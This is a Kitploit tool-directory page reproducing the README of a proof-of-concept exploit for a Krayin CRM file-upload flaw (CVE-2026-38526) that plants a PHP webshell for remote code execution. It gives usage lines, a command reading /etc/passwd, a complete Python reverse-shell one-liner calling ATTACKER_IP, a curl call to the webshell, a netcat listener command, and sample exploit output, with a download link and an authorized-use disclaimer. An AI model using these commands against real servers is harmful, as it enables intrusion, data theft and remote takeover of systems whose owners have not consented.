Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
PoC-CVE-2026-38526 — Automated exploit for Krayin CRM ≤ 2.2.x. | Kitploit
Tools/GitHubGitHub/b0nyo/poc-cve-2026-38526
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubb0nyo/poc-cve-2026-38526

PoC-CVE-2026-38526

Automated exploit for Krayin CRM ≤ 2.2.x.

View Repository
72 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-38526 - Krayin CRM PHP Upload RCE

Automated exploit for Krayin CRM ≤ 2.2.x. This script exploits an unrestricted file upload vulnerability in the TinyMCE endpoint (/admin/tinymce/upload), bypasses MIME-type validation by spoofing image/jpeg, uploads a PHP webshell, and executes arbitrary commands with web server privileges.


Vulnerability Details

PropertyValue
CVE IDCVE-2026-38526
Affected SoftwareKrayin CRM ≤ 2.2.x
Vulnerability TypeUnrestricted File Upload → Remote Code Execution
AuthenticationRequired (any valid admin account)
EndpointPOST /admin/tinymce/upload

Prerequisites

  • Python 3.7+
  • Valid admin credentials for the target Krayin CRM instance
  • Network access to the target application
  • requests library

Installation

git clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt

Usage

python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]

Arguments

FlagDescriptionExample
-iTarget URL (with or without http://)http://target.com or target.com
-uAdmin email/username[email protected]
-pAdmin passwordAdminPassword123!
-cCommand to execute (default: id)whoami

Examples

# Basic check
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"

# Custom command
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"

# Reverse shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"

Exploit Flow

  1. Authentication: Extract CSRF token from login page, authenticate with provided credentials
  2. Session Validation: Extract fresh CSRF token from authenticated dashboard
  3. Webshell Upload: Upload PHP payload to /admin/tinymce/upload with spoofed MIME type
  4. Command Execution: Execute arbitrary commands via webshell GET parameter

Sample Output

[*] Target: http://target.com
[*] Username: [email protected]

[*] Authenticating...
[+] Authentication successful

[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution

[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────

[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'

Common Issues

Authentication Failed: Verify credentials are correct and the account exists on the target.

CSRF Token Extraction Failed: Ensure the target is running vulnerable Krayin CRM and the login endpoint is accessible.

Reverse Shell Not Connecting: Ensure your listener is running (nc -lvnp <PORT>), firewall rules allow outbound connections, and the IP/port in the payload are correct.


Disclaimer

This tool is provided strictly for authorized security testing and educational purposes only. Unauthorized access to computer systems is illegal. Users are solely responsible for ensuring they have proper authorization before testing any target system. The author assumes no liability for misuse or damage caused by this tool.


References

  • TREXNEGRO Security Advisory - CVE-2026-38526
  • Krayin CRM GitHub
  • OWASP - Unrestricted File Upload

Author

b0nyo - PoC Implementation

  • GitHub

TREXNEGRO - Vulnerability Discovery

  • Security Advisories
Download Tool